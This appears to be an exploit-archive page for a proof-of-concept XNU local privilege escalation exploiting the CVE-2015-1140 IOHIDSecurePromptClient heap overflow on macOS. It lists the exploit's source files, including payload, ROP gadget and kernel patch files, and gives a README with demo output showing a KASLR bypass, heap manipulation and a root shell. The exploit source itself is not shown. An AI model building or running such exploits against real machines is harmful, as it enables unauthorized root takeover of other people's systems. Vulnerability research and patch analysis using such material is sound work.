XNU local privilege escalation via CVE-2015-1140 IOHIDSecurePromptClient injectStringGated heap overflow | poc||gtfo
Makefile
README.txt
import.h
lsym.h
lsym.m
lsym_gadgets.h
lsym_payload.m
lsym_priv.h
lsym_priv.m
main.m
patch.c
unpatch.c

README.txt

~vpwn by qwertyoruiop

generic xnu heap overflow exploitation.


demo output:

$ ./pwn
[i] Preparing payload...
[i] broke out of kaslr, kaslr_slide = 0000000001a00000
[+] Payload successfully crafted.
[i] Manipulating the heap...
[i] Exploit loaded.
[+] got r00t
sh-3.2# uname -a
Darwin qwertyoruiops-iMac.local 14.3.0 Darwin Kernel Version 14.3.0: Sat Mar  7 14:01:18 PST 2015; root:xnu-2782.20.39.0.1~1/RELEASE_X86_64 x86_64
sh-3.2#